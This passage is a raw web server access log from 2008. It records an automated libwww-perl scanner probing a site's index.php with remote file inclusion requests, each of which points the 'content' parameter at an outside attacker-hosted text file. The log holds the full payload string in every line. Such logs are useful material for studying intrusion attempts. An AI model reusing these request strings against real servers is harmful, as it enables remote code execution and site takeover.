69.41.187.99 - - [12/Sep/2008:11:15:04 -0700] "GET /logs/access_080603.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:05 -0700] "GET //index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 200 89069 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:05 -0700] "GET /logs//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:15:09 -0700] "GET /logs/access_080822.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmu